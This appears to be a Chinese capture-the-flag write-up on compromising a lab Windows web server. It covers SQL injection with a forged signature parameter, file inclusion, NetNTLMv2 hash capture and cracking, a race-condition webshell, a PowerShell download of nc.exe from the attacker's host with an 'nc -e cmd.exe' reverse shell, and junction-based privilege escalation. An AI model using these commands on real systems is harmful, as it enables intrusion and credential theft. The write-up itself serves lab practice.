基本信息

端口扫描

只有一个80:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ nmap -sC -sV -Pn 10.10.10.231

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-10 14:23 CST
Nmap scan report for 10.10.10.231
Host is up (0.069s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: OS Tidy Inc.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.70 seconds

80

目录扫描

目录扫描发现licenses:

1
2
3
4
5
6
7
gobuster dir -u http://10.10.10.231/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x asp,html,txt -t 50

/Index.html (Status: 200) [Size: 14257]
/assets (Status: 301) [Size: 150] [--> http://10.10.10.231/assets/]
/index.html (Status: 200) [Size: 14257]
/index.html (Status: 200) [Size: 14257]
/licenses (Status: 301) [Size: 152] [--> http://10.10.10.231/licenses/]

licenses

需要登录:

信息

页面源码给出一些信息,大概是用户名:

一个接口,如果缺少参数,报错注释里得到salt:

1
2
3
http://10.10.10.231/products-ajax.php?order=id+desc&h=a1b30d31d344a5a4e41e8496ccbdd26b

define('SECURE_PARAM_SALT','hie0shah6ooNoim');

加密算法

h大概是对order参数的加密签名之类的,现在有明文参数,salt,不知道加密方式,需要进一步分析:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
# order参数不同格式作为wordlist
id+desc
id%20desc
id desc

# john的各种格式
john --list=subformats | grep md5
...
Format = dynamic_1 type = dynamic_1: md5($p.$s) (joomla)
...
Format = dynamic_4 type = dynamic_4: md5($s.$p) (OSC)
...
# 根据格式知道带salt的hash格式
<hash>$<salt>

# hash
a1b30d31d344a5a4e41e8496ccbdd26b$hie0shah6ooNoim

简单的分析,知道加密方式和参数格式:

sqlmap

之后就可以自定义sql,sqlmap eval可以处理参数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
sqlmap -u "http://10.10.10.231/products-ajax.php?order=id+desc&h=a1b30d31d344a5a4e41e8496ccbdd26b" --eval="import hashlib ; h=hashlib.md5(('hie0shah6ooNoim'+order).encode('utf-8')).hexdigest()" --batch --threads=10

available databases [3]:
[*] cleaner
[*] information_schema
[*] test

sqlmap -u "http://10.10.10.231/products-ajax.php?order=id+desc&h=a1b30d31d344a5a4e41e8496ccbdd26b" --eval="import hashlib ; h=hashlib.md5(('hie0shah6ooNoim'+order).encode('utf-8')).hexdigest()" --batch --threads=10 -D cleaner -T licenses -C customer_id,id,license,product_id --dump

sqlmap -u "http://10.10.10.231/products-ajax.php?order=id+desc&h=a1b30d31d344a5a4e41e8496ccbdd26b" --eval="import hashlib ; h=hashlib.md5(('hie0shah6ooNoim'+order).encode('utf-8')).hexdigest()" --batch --threads=10 -D cleaner -T customers -C id,login,password --dump

vikki.solomon@throwaway.mail
7c6a180b36896a0a8c02787eeafb0e4c
password1

Licensing Portal

得到的任意一个账号密码登录portal:

源码里又发现类似格式的接口:

LFI

这里theme应该是include的,所以可以修改为..,h参数也对应修改,得到报错:

1
2
3
theme = ".."
import hashlib ; h=hashlib.md5(('hie0shah6ooNoim'+theme).encode('utf-8')).hexdigest()
c5427f8e0865273f4a62c614adec0985

RFI

1
2
3
theme = "http://10.10.14.3:7777"
import hashlib ; h=hashlib.md5(('hie0shah6ooNoim'+theme).encode('utf-8')).hexdigest()
6689491e9ca82644f7d54bec3a39f4ba

SMB

smbserver开启smb2support,可以得到NetNTLMv2 hash:

1
2
3
4
5
theme = "//10.10.14.3/miao"
import hashlib ; h=hashlib.md5(('hie0shah6ooNoim'+theme).encode('utf-8')).hexdigest()
411d5bd4bc64f686ca745ac4e2587125

sudo python3 ~/Tools/impacket/examples/smbserver.py -smb2support miao .

hash crack

破解出来web用户密码:

1
2
3
4
5
6
7
8
9
10
➜  Desktop sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
[sudo] password for miao:
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
charlotte123! (web)
1g 0:00:00:00 DONE (2021-05-07 08:20) 1.098g/s 1089Kp/s 1089Kc/s 1089KC/s cheers4$..chaqueto
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

条件竞争

webshell

可以使用得到的用户名密码模拟真正的smb共享,但如果直接header.inc文件写shell的话,会因为strpos检测得到403,但可以条件竞争,通过strpos校验后写入webshell,使其include:

1
2
3
sudo python3 ~/Tools/impacket/examples/smbserver.py -username web -password 'charlotte123!' -ip 10.10.14.3 -smb2support miao .

./race.sh "<?php phpinfo(); ?>"

reverse shell

下载nc反弹shell:

1
2
./race.sh '<?php system("cmd /c powershell iwr http://10.10.14.3:7777/nc.exe -outf \windows\system32\spool\drivers\color\cute.exe"); ?>'
./race.sh '<?php system("cmd /c start \windows\system32\spool\drivers\color\cute.exe 10.10.14.3 4444 -e cmd.exe"); ?>'

race.sh

1
2
3
4
5
6
#!/bin/bash
PAYLOAD=$1
while :; do
echo hello world > /Users/miao/Downloads/temp/header.inc
echo "$PAYLOAD" > /Users/miao/Downloads/temp/header.inc
done

user flag

web用户桌面目录得到user.txt:

提权信息

发现一个Cleanup,两个exe下载下来分析:

分析后可以知道server会监听cleanupPipe,接收clean指令,将输入的文件名base64,文件内容AES-GCM后存放到Cleanup目录

RESTORE是将文件解密还原到原本位置

那么我们可以考虑做一个到C:\Users \Administrator\Desktop的符号链接,clean的时候指向root.txt,RESTORE的时候删掉软链接,创建同名目录,那么就会还原到这个目录里

root flag

整个流程大概就这样,得到root.txt:

1
2
3
4
5
6
7
8
9
mklink /j miao \users\administrator\desktop

echo CLEAN \users\web\downloads\miao\root.txtx > \\.\pipe\cleanupPipe

dir \programdata\cleanup
rmdir miao
mkdir miao

echo RESTORE \users\web\downloads\miao\root.txtx > \\.\pipe\cleanupPipe

参考资料